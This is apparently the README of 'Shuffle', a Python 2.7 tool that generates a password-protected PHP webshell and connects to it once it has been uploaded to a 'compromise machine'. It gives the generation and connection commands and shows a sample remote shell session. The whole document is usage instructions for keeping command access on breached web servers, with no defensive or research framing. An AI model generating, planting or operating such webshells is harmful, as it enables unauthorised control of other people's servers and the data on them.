0.2 (Beta)
Only you need is Python 2.7
Clone repository
$ git clone https://github.com/matiasmenares/Shuffle
Shuffle 0.1 (Beta) works with Python 2.7 You can run it with:
$ python shuffle.py -h
Command:
- -g Generate shell
- -p Setting Password
- -u Url to connect
To create a webshell run:
$ python shuffle.py -g webshell.php -p h4x0r
And Webshell generate in shuffle folder.
~/shuffle/out/webshell.php
When you upload shell to compromise machine only you need is run shell with:
$ python shuffle.py -u http://localhost/webshell.php -p h4x0r
And wait to establish connection...
#> Conecction Established, Enjoy!
localhost@apache[~]$>
Now you can run all command !
#> Conecction Established, Enjoy!
localhost@apache[~]$> ls
app
lib
index.php
localhost@apache[~]$>
to close the conection type exit.
localhost@apache[~]$> exit
#> Connection Closet by user.
$
if you want change login banner modify this file:
~/shuffle/extras/banner.txt
- Fork it
- Create your feature branch (
git checkout -b my-new-feature
) - Commit your changes (
git commit -am 'Add some feature'
) - Push to the branch (
git push origin my-new-feature
) - Create new Pull Request
Done!
GNU
Free Software, Hell Yeah!